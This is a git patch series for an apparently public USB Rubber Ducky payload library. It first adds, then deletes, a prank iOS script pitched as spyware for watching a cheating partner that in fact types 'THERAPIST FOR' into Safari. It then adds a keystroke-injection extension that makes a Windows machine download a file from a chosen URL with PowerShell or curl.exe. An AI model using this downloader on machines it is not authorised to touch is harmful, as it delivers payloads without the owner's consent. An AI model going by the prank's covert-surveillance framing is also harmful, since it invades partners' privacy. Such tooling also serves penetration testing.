From 23095df0282b7ccfc0df2fd5bc837124acb8f05b Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Mon, 27 Mar 2023 15:52:24 +0200 Subject: [PATCH 1/4] Create iOS-Spy The perfect payload to get all relevant information, if you suspect your partner cheating or something similar. --- payloads/library/mobile/iOS/iOS-Spy | 73 +++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 payloads/library/mobile/iOS/iOS-Spy diff --git a/payloads/library/mobile/iOS/iOS-Spy b/payloads/library/mobile/iOS/iOS-Spy new file mode 100644 index 0000000..4d10279 --- /dev/null +++ b/payloads/library/mobile/iOS/iOS-Spy @@ -0,0 +1,73 @@ +REM iOS-Spy +REM Version 1.0 +REM OS: iOS +REM Author: 0iphor13 +REM Requirements: DuckyScript 3.0, Unlocked iOS Device, Lighting to USB-A or C OTG (camera) adapter +REM Description: The perfect payload to get all relevant information, if you suspect your partner cheating or something similar. +REM The perfectly timed keypresses are important for this payload to work - Do not change anything except the receiving e-mail address! + + +REM Define your E-Mail address +DEFINE #RECEIVER your@mail.de + +REM Keycombo - Do not change! +DEFINE $ICON T +DEFINE $V P +DEFINE $X T +DEFINE $DRAG E +DEFINE $Y R +DEFINE $BYPASS H +DEFINE $M A +DEFINE $C I +DEFINE $L S + +DELAY 2000 +GUI SPACE +DELAY 500 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +INJECT_MOD CTRL +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +STRING Safari +ENTER +DELAY 500 +GUI l +DELAY 500 +STRING $ICON +DELAY 20 +STRING $BYPASS +DELAY 20 +STRING $DRAG +DELAY 20 +STRING $Y +DELAY 20 +STRING $M +DELAY 20 +STRING $V +DELAY 20 +STRING $C +DELAY 20 +STRING $L +DELAY 20 +STRINGLN $X FOR #RECEIVER +REM Get yourself some help... respect privacy From d5e5eaebb1fa12d2c9210490995ce55e0c14cc2b Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Tue, 25 Apr 2023 09:44:20 +0200 Subject: [PATCH 2/4] Delete iOS-Spy --- payloads/library/mobile/iOS/iOS-Spy | 73 ----------------------------- 1 file changed, 73 deletions(-) delete mode 100644 payloads/library/mobile/iOS/iOS-Spy diff --git a/payloads/library/mobile/iOS/iOS-Spy b/payloads/library/mobile/iOS/iOS-Spy deleted file mode 100644 index 4d10279..0000000 --- a/payloads/library/mobile/iOS/iOS-Spy +++ /dev/null @@ -1,73 +0,0 @@ -REM iOS-Spy -REM Version 1.0 -REM OS: iOS -REM Author: 0iphor13 -REM Requirements: DuckyScript 3.0, Unlocked iOS Device, Lighting to USB-A or C OTG (camera) adapter -REM Description: The perfect payload to get all relevant information, if you suspect your partner cheating or something similar. -REM The perfectly timed keypresses are important for this payload to work - Do not change anything except the receiving e-mail address! - - -REM Define your E-Mail address -DEFINE #RECEIVER your@mail.de - -REM Keycombo - Do not change! -DEFINE $ICON T -DEFINE $V P -DEFINE $X T -DEFINE $DRAG E -DEFINE $Y R -DEFINE $BYPASS H -DEFINE $M A -DEFINE $C I -DEFINE $L S - -DELAY 2000 -GUI SPACE -DELAY 500 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -CAPSLOCK -DELAY 100 -CAPSLOCK -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -INJECT_MOD CTRL -DELAY 100 -CAPSLOCK -DELAY 100 -CAPSLOCK -DELAY 100 -STRING Safari -ENTER -DELAY 500 -GUI l -DELAY 500 -STRING $ICON -DELAY 20 -STRING $BYPASS -DELAY 20 -STRING $DRAG -DELAY 20 -STRING $Y -DELAY 20 -STRING $M -DELAY 20 -STRING $V -DELAY 20 -STRING $C -DELAY 20 -STRING $L -DELAY 20 -STRINGLN $X FOR #RECEIVER -REM Get yourself some help... respect privacy From 783f947f29c4d507a7ee773bfa3cb3ca1afe100b Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Tue, 25 Apr 2023 19:34:57 +0200 Subject: [PATCH 3/4] Create Powershell_Download Extension for the USB Rubber Ducky to download files via powershell in different ways. --- .../extensions/community/Powershell_Download | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 payloads/extensions/community/Powershell_Download diff --git a/payloads/extensions/community/Powershell_Download b/payloads/extensions/community/Powershell_Download new file mode 100644 index 0000000..4d56c7e --- /dev/null +++ b/payloads/extensions/community/Powershell_Download @@ -0,0 +1,50 @@ +EXTENSION Powershell_Download + REM VERSION 1.0 + REM Author: 0iphor13 + REM Downloads the desired file via powershell + REM Use the method you want to use, via the specific function, define the URL and the output. + + REM CONFIGURATION: + REM Delay before executing the download + DEFINE #INPUT_WAIT 2000 + REM URL of the file which gets downloaded + DEFINE #URL https://hosted.file/default + REM Output name of your downloaded file + DEFINE #OUTPUT default + + REM Use Invoke-WebRequest to download a file onto the system + FUNCTION Invoke_WebRequest() + DELAY #INPUT_WAIT + STRINGLN Invoke-WebRequest -Uri '#URL' -UseBasicParsing -OutFile #OUTPUT + END_FUNCTION + + REM Use Invoke-RestMethod to download a file onto the system + FUNCTION Invoke_RestMethod() + DELAY #INPUT_WAIT + STRINGLN Invoke-RestMethod -Uri '#URL' -UseBasicParsing -OutFile #OUTPUT + END_FUNCTION + + REM Use Start_BitsTransfer to download a file onto the system + FUNCTION Start_BitsTransfer() + DELAY #INPUT_WAIT + STRINGLN Start-BitsTransfer -Source '#URL' -Destination #OUTPUT + END_FUNCTION + + REM Use Curl.exe to download a file onto the system + FUNCTION Curl_exe() + DELAY #INPUT_WAIT + STRINGLN curl.exe -L '#URL' -o #OUTPUT + END_FUNCTION + + REM EXAMPLE USAGE AFTER EXTENSION + REM Use the function fitting your usecase, Start_BitsTransfer() is used as example here + REM DELAY 2000 + REM GUI r + REM DELAY 2000 + REM STRINGLN powershell + REM DELAY 500 + REM Start_BitsTransfer() + +END_EXTENSION + + From 556b49827b2ae102e52d0c36c97e165906f4cfdd Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Tue, 25 Apr 2023 20:35:33 +0200 Subject: [PATCH 4/4] Update Powershell_Download Changed default domain --- payloads/extensions/community/Powershell_Download | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/extensions/community/Powershell_Download b/payloads/extensions/community/Powershell_Download index 4d56c7e..4871fb0 100644 --- a/payloads/extensions/community/Powershell_Download +++ b/payloads/extensions/community/Powershell_Download @@ -8,7 +8,7 @@ EXTENSION Powershell_Download REM Delay before executing the download DEFINE #INPUT_WAIT 2000 REM URL of the file which gets downloaded - DEFINE #URL https://hosted.file/default + DEFINE #URL https://example.com/ REM Output name of your downloaded file DEFINE #OUTPUT default